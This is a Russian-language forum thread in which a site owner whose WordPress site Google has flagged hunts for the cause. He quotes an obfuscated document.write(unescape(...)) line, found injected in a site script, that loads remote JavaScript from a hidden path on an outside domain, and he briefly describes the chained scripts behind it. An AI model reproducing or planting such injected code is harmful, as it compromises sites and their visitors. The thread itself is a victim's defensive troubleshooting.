Возможно взломали сайт

И Вот опять, сегодня пришло 2 сообщения :) 1 - что вирусов больше нет - все ок. Второе - что обнаружены вирусы :((((

вот решение:

<script src="wp-includes/js/jquery/jquery.js" type="text/javascript"></script>

Добрый день!

Гоголь не хочет активировать рекламу.

цитирую:

"Сейчас сайт заблокирован, поскольку он запрашивает IP 188.64.174.13, если вы отследите и отключите связанные запросы, можно будет попробовать разблокировать"

До этого он писла что где то есть ссылка на ресурс

http://newhoststatsb . dyndns.info/

Гоголь пишет:

"эта ссылка вызывает блокировку. Поскольку в коде сайта я ее напрямую не увидел, я думаю, она генерируется динамически - соответственно необходимо пересмотреть скрипты на сайте и редиректы, которые они вызывают."

Яша вебмастер и гоголь вебмастер ничего не находят вредоносного. Я порылся в коде, и тож не нашел, касперский также ничего не обнаружил.

Чем можно просканить сайт, как отследить запросы про которые пишет гоголь?

---------- Добавлено 19.08.2013 в 13:39 ----------

Помогите абитуриенту :)

Просканил айболитом, нашел вот такую шняжку в файле скрипта

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%70%65%72%66%65%63%74%65%71%75%69%70%6D%65%6E%74%73%2E%63%6F%6D%2F%62%6D%31%2F%2E%74%6D%70%2F%2E%31%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));/*!

похоже оно:)

---------- Добавлено 20.08.2013 в 09:56 ----------

эта шнажка вызывает другой скрипт шняжку, тот вызывает еще один скрипт, другой скрипт с помощью хитрого алгоритма сортировки массива, делает с закодированной строкой ахалай махалай, получаем еще одну кодированную строку и вуаля та самая ссылка